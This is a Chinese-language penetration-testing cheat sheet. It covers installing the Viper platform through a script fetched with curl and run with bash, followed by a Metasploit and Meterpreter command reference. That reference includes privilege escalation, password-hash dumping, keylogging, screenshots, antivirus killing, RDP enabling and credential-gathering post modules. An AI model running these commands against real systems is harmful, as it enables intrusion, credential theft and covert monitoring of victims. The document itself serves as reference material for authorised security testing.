VPS安装 https://www.yuque.com/vipersec/helpopen in new window
sysctl -w vm.max_map_count = 262144
curl -o f8x https://f8x.io/
bash f8x -viper
MSF是渗透测试领域最流行的渗透测试框架,它有以下5个模块
辅 助 模 块 (Auxiliary,扫描器) 扫描主机系统,寻找可用漏洞; 渗透攻击模块 (Exploits) 进行漏洞利用攻击; 攻击载荷模块 (Payloads) 生成攻击载荷(木马); 后渗透攻击模块 (Post) 用于内网渗透的各种操作; 编 码 器 模 块 (Encoders) 选择编码技术,绕过杀软(或其他免杀方式)
所有模块位置:/usr/share/metasploit-framework/modules/
渗透步骤(Exploit) 命令 作用 search xxx #搜索某个漏洞 use xxx #使用某个漏洞利用模块 show options #查看配置选项 set payload #配置攻击载荷 exploit #执行渗透攻击
参数摘要 命令 作用 reload_all #从目录重载所有模块 back #后退命令,移出当前上下文,用于模块切换 info #目标和模块详细信息 check #检查目标是否受某个漏洞影响
sessions会话管理 命令 作用 sessions -l #列出所有会话 sessions -K #终止所有会话 sessions -i id #进入某个会话 sessions -v #以详细模式列出会话 sessions -u #在许多平台上将shell升级到meterpreter会话
show options显示可选选项 命令 作用 auxiliary #显示所有辅助模块 exploits #显示所有漏洞利用模块 payloads #显示所有有效载荷 targets #显示所有可用目标 advanced #显示更多高级选项 encoders #显示可用编码器列表
Meterpreter用例 刚获得Meterpreter Shell时,该Shell是极其脆弱的,可以把它和目标机中一个稳定的程序绑定
命令 作用 getpid #查看当前Meterpreter Shell的进程号 ps #获取目标机正运行的进程 migrate 476 #将shell迁移到PID为786的进程中
命令摘要 pwd、ls、cd
命令 作用 getuid #查看当前权限 getsystem #获得系统管理员权限(要本地管理员权限运行) hashdump #抓哈希密码 sysinfo #查看系统信息 idletim #查看目标系统已运行时间 route #查看目标机完整网络设置 shell #进入目标机shell,exit退出shell background #将meterpreter隐藏在后台
upload ./1.txt c:\1.txt #上传文件 download c:\1.txt ./ 下载文件 search -f *.txt -d c:// #搜索文件 keyscan_start #启动键盘记录 keyscan_stop #停止键盘记录 keyscan_dump #转储键盘记录的内容 screenshot #抓取截屏
后渗透模块 run post/windows/gather/checkvm
run post/linux/gather/checkvm
run post/windows/manage/killav
run post/windows/manage/enable_rdp
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_applications
run windows/gather/credentials/windows_autologin